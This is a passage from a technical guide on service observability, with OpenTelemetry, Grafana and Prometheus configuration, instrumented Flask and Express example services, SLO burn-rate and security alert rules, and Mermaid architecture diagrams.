    endpoint: jaeger:4317
    tls:
      insecure: true
 
  # Export metrics to Prometheus
  prometheus:
    endpoint: 0.0.0.0:8889
    resource_to_telemetry_conversion:
      enabled: true
 
  # Export logs to Loki
  loki:
    endpoint: http://loki:3100/loki/api/v1/push
    default_labels_enabled:
      exporter: true
      job: true
 
  # Debug exporter (development only)
  # debug:
  #   verbosity: detailed
 
extensions:
  health_check:
    endpoint: 0.0.0.0:13133
  zpages:
    endpoint: 0.0.0.0:55679
 
service:
  extensions: [health_check, zpages]
  pipelines:
    traces:
      receivers: [otlp]
      processors: [memory_limiter, filter, tail_sampling, attributes, batch]  # batch last, so exporters receive batched data
      exporters: [otlp/jaeger]
    metrics:
      receivers: [otlp, prometheus, hostmetrics]
      processors: [memory_limiter, attributes, batch]
      exporters: [prometheus]
    logs:
      receivers: [otlp]
      processors: [memory_limiter, attributes, batch]
      exporters: [loki]
 
  telemetry:
    logs:
      level: info
    metrics:
      address: 0.0.0.0:8888

5.4 Grafana Dashboard Provisioning

grafana/provisioning/datasources/datasources.yml:

apiVersion: 1
datasources:
  - name: Prometheus
    type: prometheus
    access: proxy
    url: http://prometheus:9090
    isDefault: true
    editable: false
 
  - name: Elasticsearch
    type: elasticsearch
    access: proxy
    url: http://elasticsearch:9200
    database: "logs-*"
    basicAuth: true
    basicAuthUser: "grafana_reader"
    secureJsonData:
      # Grafana expands env vars in provisioning files; the variable name is a placeholder
      basicAuthPassword: "${GRAFANA_ES_PASSWORD}"
    jsonData:
      timeField: "@timestamp"
      esVersion: "8.12.0"
      logMessageField: "message"
      logLevelField: "log_level"
 
  - name: Jaeger
    type: jaeger
    access: proxy
    url: http://jaeger:16686

grafana/provisioning/dashboards/dashboards.yml:

apiVersion: 1
providers:
  - name: "default"
    orgId: 1
    folder: "System Design Mastery"
    type: file
    disableDeletion: false
    editable: true
    options:
      path: /var/lib/grafana/dashboards
      foldersFromFilesStructure: true

Example Grafana Dashboard JSON (Golden Signals):

{
  "dashboard": {
    "title": "Golden Signals - Service Overview",
    "tags": ["golden-signals", "sre", "production"],
    "timezone": "browser",
    "refresh": "10s",
    "time": {"from": "now-1h", "to": "now"},
    "panels": [
      {
        "title": "Request Rate (Traffic)",
        "type": "timeseries",
        "gridPos": {"h": 8, "w": 12, "x": 0, "y": 0},
        "targets": [
          {
            "expr": "sum by (service) (rate(http_requests_total[5m]))",
            "legendFormat": "{{service}}"
          }
        ],
        "fieldConfig": {
          "defaults": {
            "unit": "reqps",
            "thresholds": {
              "steps": [
                {"color": "green", "value": null},
                {"color": "yellow", "value": 2800},
                {"color": "red", "value": 3500}
              ]
            }
          }
        }
      },
      {
        "title": "Error Rate (%)",
        "type": "timeseries",
        "gridPos": {"h": 8, "w": 12, "x": 12, "y": 0},
        "targets": [
          {
            "expr": "sum by (service) (rate(http_requests_total{status=~\"5..\"}[5m])) / sum by (service) (rate(http_requests_total[5m])) * 100",
            "legendFormat": "{{service}}"
          }
        ],
        "fieldConfig": {
          "defaults": {
            "unit": "percent",
            "thresholds": {
              "steps": [
                {"color": "green", "value": null},
                {"color": "yellow", "value": 0.1},
                {"color": "red", "value": 1.0}
              ]
            }
          }
        }
      },
      {
        "title": "P99 Latency",
        "type": "timeseries",
        "gridPos": {"h": 8, "w": 12, "x": 0, "y": 8},
        "targets": [
          {
            "expr": "histogram_quantile(0.99, sum by (le, service) (rate(http_request_duration_seconds_bucket[5m])))",
            "legendFormat": "{{service}} p99"
          },
          {
            "expr": "histogram_quantile(0.50, sum by (le, service) (rate(http_request_duration_seconds_bucket[5m])))",
            "legendFormat": "{{service}} p50"
          }
        ],
        "fieldConfig": {
          "defaults": {
            "unit": "s",
            "thresholds": {
              "steps": [
                {"color": "green", "value": null},
                {"color": "yellow", "value": 0.2},
                {"color": "red", "value": 0.5}
              ]
            }
          }
        }
      },
      {
        "title": "Resource Saturation",
        "type": "gauge",
        "gridPos": {"h": 8, "w": 12, "x": 12, "y": 8},
        "targets": [
          {
            "expr": "100 - (avg by (instance) (rate(node_cpu_seconds_total{mode=\"idle\"}[5m])) * 100)",
            "legendFormat": "CPU {{instance}}"
          },
          {
            "expr": "(1 - node_memory_MemAvailable_bytes / node_memory_MemTotal_bytes) * 100",
            "legendFormat": "Memory {{instance}}"
          }
        ],
        "fieldConfig": {
          "defaults": {
            "unit": "percent",
            "min": 0,
            "max": 100,
            "thresholds": {
              "steps": [
                {"color": "green", "value": null},
                {"color": "yellow", "value": 70},
                {"color": "red", "value": 90}
              ]
            }
          }
        }
      },
      {
        "title": "Error Budget Remaining",
        "type": "stat",
        "gridPos": {"h": 4, "w": 6, "x": 0, "y": 16},
        "targets": [
          {
            "expr": "1 - ((1 - (sum(rate(http_requests_total{status!~\"5..\"}[30d])) / sum(rate(http_requests_total[30d])))) / (1 - 0.999)) ",
            "legendFormat": "Error Budget"
          }
        ],
        "fieldConfig": {
          "defaults": {
            "unit": "percentunit",
            "thresholds": {
              "steps": [
                {"color": "red", "value": null},
                {"color": "yellow", "value": 0.25},
                {"color": "green", "value": 0.50}
              ]
            }
          }
        }
      }
    ]
  }
}
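
How to read the Error Budget panel: with a 99.9% SLO the allowed error rate is 0.1%, so the expression computes 1 - (observed 30-day error rate / 0.001). For example, an observed error rate of 0.05% leaves 1 - 0.0005/0.001 = 0.50, i.e. half the budget remaining, which is exactly the green threshold above.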

5.5 PagerDuty Integration Summary

┌──────────┐    ┌──────────────┐    ┌───────────┐    ┌──────────┐
│Prometheus │───►│ Alertmanager │───►│ PagerDuty │───►│ On-call  │
│ (fires   │    │ (routes,     │    │           │    │ Engineer │
│  alert)  │    │  groups,     │    │ - Phone   │    │          │
│          │    │  dedup)      │    │ - SMS     │    │ Ack /    │
│          │    │              │    │ - Push    │    │ Resolve  │
└──────────┘    └──────────────┘    │ - Email   │    └──────────┘
                                     │           │
                                     │ Escalation│
                                     │ Policy    │
                                     └───────────┘

Workflow:

  1. Prometheus evaluates alert rule → fires alert
  2. Alertmanager receives, groups, deduplicates
  3. Alertmanager sends to PagerDuty via Events API v2
  4. PagerDuty creates incident → notifies on-call per escalation policy
  5. Engineer acknowledges → starts investigation
  6. Engineer resolves → PagerDuty updates status
  7. Alertmanager sends resolved → PagerDuty auto-resolves
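
For step 3, a minimal Alertmanager receiver sketch (the receiver name and routing key are placeholders, not values from this stack):

alertmanager.yml (receiver excerpt):

receivers:
  - name: pagerduty-oncall
    pagerduty_configs:
      # Events API v2 integration key from the PagerDuty service (placeholder)
      - routing_key: "<pagerduty-events-api-v2-key>"
        severity: '{{ .CommonLabels.severity }}'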

6. Code — Instrumentation Examples

6.1 Python: Flask App with Prometheus Metrics + Structured Logging + OpenTelemetry

"""
Full observability instrumentation for a Python Flask service.
Includes: Prometheus metrics, structured logging, OpenTelemetry tracing.
"""
 
import time
import logging
import json
import sys
from datetime import datetime, timezone
 
from flask import Flask, request, g
from prometheus_client import (
    Counter, Histogram, Gauge, Info,
    generate_latest, CONTENT_TYPE_LATEST
)
from opentelemetry import trace
from opentelemetry.sdk.trace import TracerProvider
from opentelemetry.sdk.trace.export import BatchSpanProcessor
from opentelemetry.exporter.otlp.proto.grpc.trace_exporter import OTLPSpanExporter
from opentelemetry.instrumentation.flask import FlaskInstrumentor
from opentelemetry.instrumentation.requests import RequestsInstrumentor
from opentelemetry.sdk.resources import Resource
 
 
# ============================================================
# 1. STRUCTURED LOGGING SETUP
# ============================================================
 
class StructuredJsonFormatter(logging.Formatter):
    """
    Custom JSON formatter cho structured logging.
    Mọi log output đều là JSON — dễ parse bởi Logstash/Fluentd/Loki.
    """
    def format(self, record):
        log_entry = {
            "timestamp": datetime.now(timezone.utc).isoformat(),
            "level": record.levelname,
            "logger": record.name,
            "message": record.getMessage(),
            "service": "payment-service",
            "instance": "payment-7b4f9d8c-x2k9p",
            "version": "2.1.0",
        }
 
        # Add trace context if available
        span = trace.get_current_span()
        if span and span.is_recording():
            ctx = span.get_span_context()
            log_entry["trace_id"] = format(ctx.trace_id, "032x")
            log_entry["span_id"] = format(ctx.span_id, "016x")
 
        # Add request context if available
        if hasattr(g, "request_id"):
            log_entry["request_id"] = g.request_id
 
        # Add extra fields
        if hasattr(record, "extra_fields"):
            log_entry.update(record.extra_fields)
 
        # Add exception info
        if record.exc_info and record.exc_info[0]:
            log_entry["exception"] = {
                "type": record.exc_info[0].__name__,
                "message": str(record.exc_info[1]),
                "traceback": self.formatException(record.exc_info),
            }
 
        return json.dumps(log_entry, default=str)
 
 
def setup_logging():
    handler = logging.StreamHandler(sys.stdout)
    handler.setFormatter(StructuredJsonFormatter())
 
    root_logger = logging.getLogger()
    root_logger.handlers.clear()
    root_logger.addHandler(handler)
    root_logger.setLevel(logging.INFO)
 
    return logging.getLogger("payment-service")
 
 
logger = setup_logging()
 
 
# ============================================================
# 2. OPENTELEMETRY TRACING SETUP
# ============================================================
 
def setup_tracing(app: Flask):
    resource = Resource.create({
        "service.name": "payment-service",
        "service.version": "2.1.0",
        "deployment.environment": "production",
    })
 
    provider = TracerProvider(resource=resource)
 
    # Export traces to OTel Collector via OTLP/gRPC
    otlp_exporter = OTLPSpanExporter(
        endpoint="otel-collector:4317",
        insecure=True,  # Use TLS in production!
    )
    provider.add_span_processor(BatchSpanProcessor(otlp_exporter))
    trace.set_tracer_provider(provider)
 
    # Auto-instrument Flask
    FlaskInstrumentor().instrument_app(app)
    # Auto-instrument outgoing HTTP requests
    RequestsInstrumentor().instrument()
 
    return trace.get_tracer("payment-service")
 
 
# ============================================================
# 3. PROMETHEUS METRICS SETUP
# ============================================================
 
# Service info
SERVICE_INFO = Info("service", "Service information")
SERVICE_INFO.info({
    "name": "payment-service",
    "version": "2.1.0",
    "language": "python",
})
 
# Request metrics (RED method)
REQUEST_COUNT = Counter(
    "http_requests_total",
    "Total HTTP requests",
    ["method", "path", "status"]
)
 
REQUEST_DURATION = Histogram(
    "http_request_duration_seconds",
    "HTTP request duration in seconds",
    ["method", "path"],
    buckets=[0.005, 0.01, 0.025, 0.05, 0.1, 0.25, 0.5, 1.0, 2.5, 5.0, 10.0]
)
 
REQUEST_SIZE = Histogram(
    "http_request_size_bytes",
    "HTTP request size in bytes",
    ["method", "path"],
    buckets=[100, 500, 1000, 5000, 10000, 50000, 100000, 500000]
)
 
RESPONSE_SIZE = Histogram(
    "http_response_size_bytes",
    "HTTP response size in bytes",
    ["method", "path"],
    buckets=[100, 500, 1000, 5000, 10000, 50000, 100000, 500000]
)
 
# Business metrics
PAYMENT_PROCESSED = Counter(
    "payments_processed_total",
    "Total payments processed",
    ["status", "method"]   # status: success/failed, method: card/bank/wallet
)
 
PAYMENT_AMOUNT = Histogram(
    "payment_amount_usd",
    "Payment amount in USD",
    ["method"],
    buckets=[1, 5, 10, 50, 100, 500, 1000, 5000, 10000]
)
 
# Resource metrics
ACTIVE_CONNECTIONS = Gauge(
    "active_connections",
    "Number of active connections"
)
 
DB_POOL_SIZE = Gauge(
    "db_connection_pool_size",
    "Database connection pool size",
    ["state"]   # active, idle, waiting
)
 
 
# ============================================================
# 4. FLASK APP WITH INSTRUMENTATION
# ============================================================
 
app = Flask(__name__)
tracer = setup_tracing(app)
 
 
@app.before_request
def before_request():
    g.start_time = time.time()
    g.request_id = request.headers.get("X-Request-ID", "unknown")
    ACTIVE_CONNECTIONS.inc()
 
 
@app.after_request
def after_request(response):
    # Calculate duration
    duration = time.time() - g.start_time
    path = request.url_rule.rule if request.url_rule else request.path
 
    # Record metrics
    REQUEST_COUNT.labels(
        method=request.method,
        path=path,
        status=response.status_code
    ).inc()
 
    REQUEST_DURATION.labels(
        method=request.method,
        path=path
    ).observe(duration)
 
    REQUEST_SIZE.labels(
        method=request.method,
        path=path
    ).observe(request.content_length or 0)
 
    RESPONSE_SIZE.labels(
        method=request.method,
        path=path
    ).observe(response.content_length or 0)
 
    ACTIVE_CONNECTIONS.dec()
 
    # Structured access log
    logger.info(
        "Request completed",
        extra={"extra_fields": {
            "method": request.method,
            "path": request.path,
            "status_code": response.status_code,
            "duration_ms": round(duration * 1000, 2),
            "client_ip": request.remote_addr,
            "user_agent": request.headers.get("User-Agent", ""),
            "request_id": g.request_id,
        }}
    )
 
    return response
 
 
@app.route("/api/v1/payments", methods=["POST"])
def process_payment():
    """Example endpoint with full instrumentation."""
    with tracer.start_as_current_span("process_payment") as span:
        # Defaults so the except branch can still label metrics and logs
        amount, method = 0, "unknown"
        try:
            data = request.get_json()
            amount = data.get("amount", 0)
            method = data.get("payment_method", "card")
 
            # Add span attributes (for trace context)
            span.set_attribute("payment.amount", amount)
            span.set_attribute("payment.method", method)
            span.set_attribute("payment.currency", "USD")
 
            # Simulate DB call
            with tracer.start_as_current_span("db_insert_payment"):
                time.sleep(0.02)  # Simulate DB latency
 
            # Simulate external payment gateway call
            with tracer.start_as_current_span("call_payment_gateway") as gw_span:
                gw_span.set_attribute("gateway.name", "stripe")
                time.sleep(0.1)  # Simulate gateway latency
 
            # Record business metrics
            PAYMENT_PROCESSED.labels(status="success", method=method).inc()
            PAYMENT_AMOUNT.labels(method=method).observe(amount)
 
            logger.info("Payment processed successfully", extra={"extra_fields": {
                "payment_method": method,
                "amount": amount,
                "event": "payment_success",
            }})
 
            return {"status": "success", "transaction_id": "txn_abc123"}, 200
 
        except Exception as e:
            PAYMENT_PROCESSED.labels(status="failed", method=method).inc()
            span.record_exception(e)
            span.set_status(trace.StatusCode.ERROR, str(e))
 
            logger.error("Payment processing failed", exc_info=True, extra={"extra_fields": {
                "payment_method": method,
                "amount": amount,
                "event": "payment_failed",
            }})
 
            return {"status": "error", "message": "Payment failed"}, 500
 
 
@app.route("/metrics")
def metrics():
    """Prometheus metrics endpoint."""
    return generate_latest(), 200, {"Content-Type": CONTENT_TYPE_LATEST}
 
 
@app.route("/health")
def health():
    return {"status": "healthy"}, 200
 
 
if __name__ == "__main__":
    logger.info("Starting payment service", extra={"extra_fields": {"event": "startup"}})
    app.run(host="0.0.0.0", port=8082, debug=False)

6.2 Node.js: Express App with Full Observability

/**
 * Full observability instrumentation for a Node.js Express service.
 * Includes: Prometheus metrics, structured logging (pino), OpenTelemetry tracing.
 */
 
// ============================================================
// 1. OPENTELEMETRY SETUP (must be first import!)
// ============================================================
const { NodeSDK } = require("@opentelemetry/sdk-node");
const {
  OTLPTraceExporter,
} = require("@opentelemetry/exporter-trace-otlp-grpc");
const {
  getNodeAutoInstrumentations,
} = require("@opentelemetry/auto-instrumentations-node");
const { Resource } = require("@opentelemetry/resources");
const {
  SEMRESATTRS_SERVICE_NAME,
  SEMRESATTRS_SERVICE_VERSION,
  SEMRESATTRS_DEPLOYMENT_ENVIRONMENT,
} = require("@opentelemetry/semantic-conventions");
 
const sdk = new NodeSDK({
  resource: new Resource({
    [SEMRESATTRS_SERVICE_NAME]: "order-service",
    [SEMRESATTRS_SERVICE_VERSION]: "1.5.0",
    [SEMRESATTRS_DEPLOYMENT_ENVIRONMENT]: "production",
  }),
  traceExporter: new OTLPTraceExporter({
    // OTLP over gRPC; the grpc exporter expects an http(s) scheme
    url: "http://otel-collector:4317",
  }),
  instrumentations: [
    getNodeAutoInstrumentations({
      "@opentelemetry/instrumentation-fs": { enabled: false }, // noisy
    }),
  ],
});
 
sdk.start();
 
// ============================================================
// 2. STRUCTURED LOGGING (pino)
// ============================================================
const pino = require("pino");
const { trace, context } = require("@opentelemetry/api");
 
const logger = pino({
  level: process.env.LOG_LEVEL || "info",
  formatters: {
    level(label) {
      return { level: label };
    },
  },
  mixin() {
    // Inject trace context into every log line
    const span = trace.getSpan(context.active());
    if (span) {
      const ctx = span.spanContext();
      return {
        trace_id: ctx.traceId,
        span_id: ctx.spanId,
      };
    }
    return {};
  },
  base: {
    service: "order-service",
    version: "1.5.0",
    environment: "production",
  },
  // PII redaction paths
  redact: {
    paths: [
      "req.headers.authorization",
      "req.headers.cookie",
      "body.password",
      "body.credit_card",
      "body.ssn",
      "user.email",
    ],
    censor: "[REDACTED]",
  },
  timestamp: pino.stdTimeFunctions.isoTime,
});
 
// ============================================================
// 3. PROMETHEUS METRICS
// ============================================================
const promClient = require("prom-client");
const { register } = promClient;
 
// Default metrics (Node.js runtime: event loop, GC, memory, etc.)
promClient.collectDefaultMetrics({
  prefix: "nodejs_",
  gcDurationBuckets: [0.001, 0.01, 0.1, 1, 2, 5],
});
 
// RED metrics
const httpRequestsTotal = new promClient.Counter({
  name: "http_requests_total",
  help: "Total number of HTTP requests",
  labelNames: ["method", "path", "status"],
});
 
const httpRequestDuration = new promClient.Histogram({
  name: "http_request_duration_seconds",
  help: "HTTP request duration in seconds",
  labelNames: ["method", "path"],
  buckets: [0.005, 0.01, 0.025, 0.05, 0.1, 0.25, 0.5, 1, 2.5, 5, 10],
});
 
const httpRequestSize = new promClient.Histogram({
  name: "http_request_size_bytes",
  help: "HTTP request payload size",
  labelNames: ["method", "path"],
  buckets: [100, 500, 1000, 5000, 10000, 50000, 100000],
});
 
// Business metrics
const ordersCreated = new promClient.Counter({
  name: "orders_created_total",
  help: "Total orders created",
  labelNames: ["status"],
});
 
const orderAmount = new promClient.Histogram({
  name: "order_amount_usd",
  help: "Order amount in USD",
  buckets: [10, 50, 100, 500, 1000, 5000],
});
 
const activeWebSockets = new promClient.Gauge({
  name: "active_websocket_connections",
  help: "Number of active WebSocket connections",
});
 
// ============================================================
// 4. EXPRESS APP
// ============================================================
const express = require("express");
const app = express();
 
app.use(express.json());
 
// Metrics middleware
app.use((req, res, next) => {
  const start = process.hrtime.bigint();
 
  res.on("finish", () => {
    const duration = Number(process.hrtime.bigint() - start) / 1e9;
    const path = req.route?.path || req.path;
 
    // Skip metrics endpoint from recording
    if (path === "/metrics" || path === "/health") return;
 
    httpRequestsTotal.inc({
      method: req.method,
      path: path,
      status: res.statusCode,
    });
 
    httpRequestDuration.observe(
      { method: req.method, path: path },
      duration
    );
 
    httpRequestSize.observe(
      { method: req.method, path: path },
      parseInt(req.headers["content-length"] || "0", 10)
    );
 
    // Structured access log
    logger.info({
      msg: "Request completed",
      method: req.method,
      path: req.path,
      status_code: res.statusCode,
      duration_ms: Math.round(duration * 1000),
      client_ip: req.ip,
      request_id: req.headers["x-request-id"] || "unknown",
    });
  });
 
  next();
});
 
// Routes
app.post("/api/v1/orders", async (req, res) => {
  // The HTTP server span is already created by auto-instrumentation
 
  try {
    const { items, total_amount } = req.body;
 
    logger.info({
      msg: "Processing new order",
      items_count: items?.length,
      total_amount,
      event: "order_processing",
    });
 
    // Simulate order processing
    await new Promise((resolve) => setTimeout(resolve, 50));
 
    // Record business metrics
    ordersCreated.inc({ status: "success" });
    orderAmount.observe(total_amount || 0);
 
    logger.info({
      msg: "Order created successfully",
      order_id: "ord_xyz789",
      total_amount,
      event: "order_created",
    });
 
    res.status(201).json({
      status: "success",
      order_id: "ord_xyz789",
    });
  } catch (err) {
    ordersCreated.inc({ status: "failed" });
 
    logger.error({
      msg: "Order creation failed",
      error: err.message,
      stack: err.stack,
      event: "order_failed",
    });
 
    res.status(500).json({ status: "error", message: "Order failed" });
  }
});
 
// Prometheus metrics endpoint
app.get("/metrics", async (req, res) => {
  res.set("Content-Type", register.contentType);
  res.end(await register.metrics());
});
 
// Health check
app.get("/health", (req, res) => {
  res.json({ status: "healthy", uptime: process.uptime() });
});
 
const PORT = process.env.PORT || 8083;
app.listen(PORT, () => {
  logger.info({ msg: `Order service started on port ${PORT}`, event: "startup" });
});
 
// Graceful shutdown
process.on("SIGTERM", async () => {
  logger.info({ msg: "Received SIGTERM, shutting down gracefully", event: "shutdown" });
  await sdk.shutdown();
  process.exit(0);
});

6.3 Alerting Rules YAML (Prometheus)

prometheus/alert-rules.yml:

groups:
  # ===========================================================
  # GOLDEN SIGNALS ALERTS
  # ===========================================================
  - name: golden_signals
    rules:
      # --- LATENCY ---
      - alert: HighP99Latency
        expr: |
          histogram_quantile(0.99,
            sum by (le, service) (rate(http_request_duration_seconds_bucket[5m]))
          ) > 0.5
        for: 5m
        labels:
          severity: high
          category: performance
        annotations:
          summary: "P99 latency > 500ms for {{ $labels.service }}"
          description: "P99 latency is {{ $value | humanizeDuration }} for service {{ $labels.service }}"
          runbook_url: "https://wiki.internal/runbooks/high-latency"
 
      - alert: CriticalP99Latency
        expr: |
          histogram_quantile(0.99,
            sum by (le, service) (rate(http_request_duration_seconds_bucket[5m]))
          ) > 2.0
        for: 2m
        labels:
          severity: critical
          category: performance
        annotations:
          summary: "P99 latency > 2s for {{ $labels.service }}"
          runbook_url: "https://wiki.internal/runbooks/critical-latency"
 
      # --- ERRORS ---
      - alert: HighErrorRate
        expr: |
          sum by (service) (rate(http_requests_total{status=~"5.."}[5m]))
          /
          sum by (service) (rate(http_requests_total[5m]))
          > 0.01
        for: 5m
        labels:
          severity: high
          category: errors
        annotations:
          summary: "Error rate > 1% for {{ $labels.service }}"
          description: "Error rate is {{ $value | humanizePercentage }} for service {{ $labels.service }}"
          runbook_url: "https://wiki.internal/runbooks/high-error-rate"
 
      - alert: CriticalErrorRate
        expr: |
          sum by (service) (rate(http_requests_total{status=~"5.."}[5m]))
          /
          sum by (service) (rate(http_requests_total[5m]))
          > 0.05
        for: 2m
        labels:
          severity: critical
          category: errors
        annotations:
          summary: "Error rate > 5% for {{ $labels.service }}"
          runbook_url: "https://wiki.internal/runbooks/critical-error-rate"
 
      # --- TRAFFIC ---
      - alert: TrafficAnomaly
        expr: |
          sum(rate(http_requests_total[5m]))
          >
          2 * avg_over_time(sum(rate(http_requests_total[5m]))[7d:1h])
        for: 10m
        labels:
          severity: warning
          category: traffic
        annotations:
          summary: "Traffic is 2x above 7-day average"
          description: "Current QPS: {{ $value | humanize }}. Could be organic growth or DDoS."
 
      - alert: ZeroTraffic
        expr: sum(rate(http_requests_total[5m])) == 0
        for: 5m
        labels:
          severity: critical
          category: traffic
        annotations:
          summary: "Zero traffic detected — possible total outage"
          runbook_url: "https://wiki.internal/runbooks/zero-traffic"
 
      # --- SATURATION ---
      - alert: HighCPUUsage
        expr: |
          100 - (avg by (instance) (rate(node_cpu_seconds_total{mode="idle"}[5m])) * 100) > 85
        for: 10m
        labels:
          severity: warning
          category: saturation
        annotations:
          summary: "CPU usage > 85% on {{ $labels.instance }}"
 
      - alert: HighMemoryUsage
        expr: |
          (1 - node_memory_MemAvailable_bytes / node_memory_MemTotal_bytes) * 100 > 90
        for: 5m
        labels:
          severity: high
          category: saturation
        annotations:
          summary: "Memory usage > 90% on {{ $labels.instance }}"
 
      - alert: DiskSpaceLow
        expr: |
          (1 - node_filesystem_avail_bytes{mountpoint="/"} / node_filesystem_size_bytes{mountpoint="/"}) * 100 > 85
        for: 15m
        labels:
          severity: warning
          category: saturation
        annotations:
          summary: "Disk usage > 85% on {{ $labels.instance }}"
          description: "Disk will be full in {{ $value | humanizeDuration }} at current rate"
 
      - alert: DiskWillFillIn7Days
        expr: |
          predict_linear(node_filesystem_avail_bytes{mountpoint="/"}[7d], 7*24*3600) < 0
        for: 1h
        labels:
          severity: high
          category: saturation
        annotations:
          summary: "Disk predicted to fill within 7 days on {{ $labels.instance }}"
 
  # ===========================================================
  # SLO-BASED BURN RATE ALERTS
  # ===========================================================
  - name: slo_burn_rate
    rules:
      # SLO: 99.9% availability (error budget = 0.1%)
      # Burn rate 14.4x → budget exhausted in ~2 days
      - alert: SLOBurnRateCritical
        expr: |
          (
            sum(rate(http_requests_total{status=~"5.."}[5m]))
            /
            sum(rate(http_requests_total[5m]))
          ) > (14.4 * 0.001)
          and
          (
            sum(rate(http_requests_total{status=~"5.."}[1h]))
            /
            sum(rate(http_requests_total[1h]))
          ) > (14.4 * 0.001)
        for: 2m
        labels:
          severity: critical
          category: slo
        annotations:
          summary: "SLO burn rate > 14.4x — error budget exhausts in ~2 days"
          runbook_url: "https://wiki.internal/runbooks/slo-burn-rate"
 
      # Burn rate 6x → budget exhausted in ~5 days
      - alert: SLOBurnRateHigh
        expr: |
          (
            sum(rate(http_requests_total{status=~"5.."}[30m]))
            /
            sum(rate(http_requests_total[30m]))
          ) > (6 * 0.001)
          and
          (
            sum(rate(http_requests_total{status=~"5.."}[6h]))
            /
            sum(rate(http_requests_total[6h]))
          ) > (6 * 0.001)
        for: 5m
        labels:
          severity: high
          category: slo
        annotations:
          summary: "SLO burn rate > 6x — error budget exhausts in ~5 days"
 
  # ===========================================================
  # SECURITY ALERTS
  # ===========================================================
  - name: security_alerts
    rules:
      - alert: HighRateOf401
        expr: |
          sum(rate(http_requests_total{status="401"}[5m])) > 50
        for: 2m
        labels:
          severity: high
          category: security
        annotations:
          summary: "High rate of 401 Unauthorized — possible brute force attack"
          runbook_url: "https://wiki.internal/runbooks/auth-attack"
 
      - alert: HighRateOf403
        expr: |
          sum(rate(http_requests_total{status="403"}[5m])) > 100
        for: 2m
        labels:
          severity: high
          category: security
        annotations:
          summary: "High rate of 403 Forbidden — possible enumeration attack"
 
      - alert: SuspiciousTrafficSpike
        expr: |
          sum(rate(http_requests_total[1m]))
          >
          5 * avg_over_time(sum(rate(http_requests_total[1m]))[1d:5m])
        for: 5m
        labels:
          severity: critical
          category: security
        annotations:
          summary: "Traffic spike 5x above daily average — possible DDoS"
          runbook_url: "https://wiki.internal/runbooks/ddos-response"
 
  # ===========================================================
  # MONITORING THE MONITORING (Meta-monitoring)
  # ===========================================================
  - name: meta_monitoring
    rules:
      - alert: PrometheusTargetDown
        expr: up == 0
        for: 3m
        labels:
          severity: high
          category: monitoring
        annotations:
          summary: "Prometheus target {{ $labels.instance }} is down"
 
      - alert: PrometheusStorageFull
        expr: |
          prometheus_tsdb_storage_blocks_bytes / (50 * 1024^3) > 0.85
        for: 15m
        labels:
          severity: warning
          category: monitoring
        annotations:
          summary: "Prometheus storage > 85% of 50GB limit"
 
      - alert: AlertmanagerNotificationFailed
        expr: |
          rate(alertmanager_notifications_failed_total[5m]) > 0
        for: 5m
        labels:
          severity: high
          category: monitoring
        annotations:
          summary: "Alertmanager failing to send notifications via {{ $labels.integration }}"
 
      - alert: HighCardinalitySeries
        expr: prometheus_tsdb_head_series > 500000
        for: 15m
        labels:
          severity: warning
          category: monitoring
        annotations:
          summary: "Prometheus tracking {{ $value }} active series — cardinality may be too high"

7. Mermaid Diagrams

7.1 Observability Stack Architecture

flowchart TB
    subgraph "Application Layer"
        A1[Service A<br/>Python/Flask]
        A2[Service B<br/>Node.js/Express]
        A3[Service C<br/>Go/Gin]
    end

    subgraph "Collection Layer"
        direction TB
        P[Prometheus<br/>Scrapes /metrics<br/>every 15s]
        OC[OpenTelemetry<br/>Collector]
        FB[Filebeat<br/>Log Shipper]
    end

    subgraph "Processing Layer"
        LS[Logstash<br/>Parse · Filter PII<br/>Transform · Enrich]
    end

    subgraph "Storage Layer"
        TSDB[(Prometheus TSDB<br/>Metrics · 30d)]
        ES[(Elasticsearch<br/>Logs · 90d)]
        JG[(Jaeger<br/>Traces · 7d)]
    end

    subgraph "Visualization Layer"
        GR[Grafana<br/>Dashboards]
        KB[Kibana<br/>Log Search]
        JU[Jaeger UI<br/>Trace Explorer]
    end

    subgraph "Alerting Layer"
        AM[Alertmanager<br/>Route · Group · Dedup]
        PD[PagerDuty<br/>Escalation]
        SL[Slack<br/>Notifications]
        EM[Email<br/>Reports]
    end

    %% Data Flow
    A1 & A2 & A3 -->|"/metrics"| P
    A1 & A2 & A3 -->|"OTLP gRPC"| OC
    A1 & A2 & A3 -->|"stdout/files"| FB

    P -->|"store"| TSDB
    OC -->|"traces"| JG
    OC -->|"metrics"| TSDB
    FB -->|"ship"| LS
    LS -->|"index"| ES

    TSDB --> GR
    ES --> KB
    ES --> GR
    JG --> JU
    JG --> GR

    P -->|"alert rules"| AM
    AM --> PD
    AM --> SL
    AM --> EM

    style P fill:#e65100,stroke:#333,color:#fff
    style GR fill:#f9a825,stroke:#333
    style AM fill:#c62828,stroke:#333,color:#fff
    style OC fill:#1565c0,stroke:#333,color:#fff
    style ES fill:#2e7d32,stroke:#333,color:#fff

7.2 Alert Escalation Flow

flowchart TD
    A[Prometheus<br/>Alert Rule Fires] --> B{Alertmanager<br/>Receives Alert}

    B --> C{Severity?}

    C -->|P1 Critical| D[PagerDuty<br/>+ Slack #incidents]
    C -->|P2 High| E[Slack #incidents]
    C -->|P3 Warning| F[Slack #alerts]
    C -->|P4 Info| G[Email / Dashboard]

    D --> H{On-call Primary<br/>Ack in 5min?}
    H -->|Yes| I[Primary Investigates]
    H -->|No| J{On-call Secondary<br/>Ack in 10min?}

    J -->|Yes| K[Secondary Investigates]
    J -->|No| L{Engineering Manager<br/>Ack in 15min?}

    L -->|Yes| M[Manager Coordinates]
    L -->|No| N[VP/CTO Notified<br/>War Room Opened]

    I --> O{Resolved?}
    K --> O
    M --> O
    N --> O

    O -->|Yes| P[Alertmanager sends<br/>RESOLVED notification]
    O -->|No, > 30 min| Q[Incident Commander<br/>Declared]

    P --> R[Postmortem<br/>within 48h]
    Q --> S[Cross-team Response<br/>Status Page Updated]
    S --> O

    E --> T[On-call Reviews<br/>within 30min]
    F --> U[Team Reviews<br/>within 4h]

    style D fill:#c62828,stroke:#333,color:#fff
    style N fill:#c62828,stroke:#333,color:#fff
    style P fill:#2e7d32,stroke:#333,color:#fff
    style Q fill:#e65100,stroke:#333,color:#fff

7.3 Request Lifecycle with Observability

sequenceDiagram
    participant U as User
    participant GW as API Gateway
    participant OS as Order Service
    participant PS as Payment Service
    participant DB as Database
    participant P as Prometheus
    participant L as Logstash/ES
    participant J as Jaeger

    Note over U,J: trace_id: abc-123 propagated via W3C headers

    U->>GW: POST /api/orders
    activate GW
    Note right of GW: span_id: s1<br/>Log: "Received request"<br/>Metric: request_count++

    GW->>OS: Forward + traceparent header
    activate OS
